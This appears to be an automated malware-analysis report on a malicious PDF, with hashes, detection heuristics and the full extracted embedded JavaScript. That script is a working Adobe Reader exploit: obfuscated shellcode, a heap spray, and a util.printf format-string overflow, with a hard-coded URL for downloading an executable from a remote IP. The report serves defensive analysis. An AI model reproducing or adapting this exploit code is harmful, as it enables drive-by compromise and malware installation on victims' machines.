Malicious PDF — malware analysis report

Static analysis result for SHA-256 b4aecf5d1fac701b…

MALICIOUS

PDF

3.1 KB Created: 2008-08-03 07:51:49 -09:03 Authoring application: Adobe InDesign CS3 (5.0) (via Adobe PDF Library 8.1) First seen: 2026-05-08
MD5: 4521be2db60d72061f030e91d8a45cec SHA-1: 4cace1470e1e1d7d62ad004cda5c186dd974079c SHA-256: b4aecf5d1fac701bef25826be9837b5915eccd0595280432e7be95ada99b58c4
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The unescape() call suggests obfuscation, and a suspicious JavaScript file was extracted. The embedded script likely attempts to download and execute a second-stage payload, which is a common technique for initial access.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    OS80c = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://78.26.179.61/style.exe?id=0&sid=7b4b7c48784e7d4e7c4d7023764b2754335d32417c497e4f7d4a7b4f&e=98 Referenced by PDF JavaScript

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x37C 2628 bytes
SHA-256: 6c869b3b40cb7f55dfe76cebaabbf6c7195f55451b5cf39a2754e5bdd1fbaef0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function NXi7UcVQQ() {
var LUcv5 = "http://78.26.179.61/style.exe?id=0&sid=7b4b7c48784e7d4e7c4d7023764b2754335d32417c497e4f7d4a7b4f&e=98";
var YbAIGy = '';
   function abrvalg(arg) {
      var out = "";
      for (var i=0; i<arg.length;i=i+4) {
         var br1 = parseInt('0x'+arg[i] + arg[i+1], 16).toString(16);
         var br2 = parseInt('0x'+arg[i+2] + arg[i+3], 16).toString(16);
         if(br2.length == 1) { br2 = "0" + br2; };
         if(br1.length == 1) { br1 = "0" + br1; };
         out = out + "%u" + br1 + br2;
      }
      return out;
  }
	
for (i = 0; i < LUcv5.length; ) 
{
YbAIGy += '%u' + ((i+1<LUcv5.length)?LUcv5.charCodeAt(i+1).toString(16):'00')+LUcv5.charCodeAt(i).toString(16);	
i = i + 2;
}

OS80c = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
"bfaze805xffecfffrf8b7fdf4eefef64efe3af9f"+
"6442f39zf64x6ee7erf03ezfeb64efb9036187e1a"+
"10z703ef11efefaa66b9zeb7787651107e1ef1f"+
"efefaa66bz9e7ca871r05f072defz0defefaa66b"+
"9e391870dx37079cef3rbefefaa66zb9ff2e870a"+
"960757ef29ezfefaa66arxffbd76f9a2c6615f7a"+
"ae806efeeb1ezf9a6664crbebaaexe8564b6f7ba"+
("07b9ef64efef87zbff5d9r9fxcz07807efef66eff").replace(new RegExp(/[zxswqr]/g),"")+
"3aa2ax6z42f6c66bfcfaa10rz87efefbfefaa6485"+
"fbb6edxba6407zf7ef8eefefraaexc28cfb3efc19"+
"1288raexbaf8a97efef9a10z64rcfe3xaaee8564b6"+
"f7baarzfx07efef85efb7exz8aaecdccbbc3410bcc"+
"f9axbcrbfaa648z5f3b6eabxa6407f7zefccefefef"+
"859xa1zr064cfe7aaed8564b6zf7baff07efef85e"+
"f64exfffraaee856z4b6f7baef07efefaeefbdb4"+
"0eec0xeecr0eec0eecz036cb5eb64bcz0d35bd180"+
"f1064bxa64rz03e792b264b9e39c6464d3f19bec"+
"97b91c9x964rzeccfdc1ca62642ae2cecdcb9e01"+
"9ff511dd5e7xr9b212zeece2af1d1ez0411d49ab1"+
"b50a0464b564erccb8932e36464a4zf3b532ece"+
"b64xec64b12a2xrdb2zefe71b071011zba10a3bda0a2efa1"
).replace(new RegExp(/[zxswqr]/g),"")));

home = unescape(YbAIGy);

runnable = OS80c+home;
skipper = unescape(abrvalg(("0zx505"+"w0r5q0qq5").replace(new RegExp(/[zxswqr]/g),"")));

while (skipper.length<20+runnable.length)
{
	skipper+=skipper;
}

skipper1 = skipper.substring(0, 20+runnable.length);
skipper2 = skipper.substring(0, skipper.length-20-runnable.length);

while(skipper2.length<(0x40000-20-runnable.length))
{
	skipper2 += skipper2;
	skipper2 += skipper1;//skipper2 = skipper2+skipper2+skipper1;
}

context = new Array();
ii=-1;

while(++ii<1414)
{
	context[ii] = skipper2 + runnable;
}

var n2m2 = 12;
for(i = 0; i < 18; i++){ n2m2 = n2m2 + "9"; }
for(i = 0; i < 276; i++){ n2m2 = n2m2 + "8"; }
var str = "l25k34u35d30u30d30l66";
var fyt = unescape(str.replace(new RegExp(/[lkud]/g),"%"));
var fmck = util;
fmck.printf(fyt, n2m2);
	};

Open this report in the interactive analyzer, or submit your own file for analysis.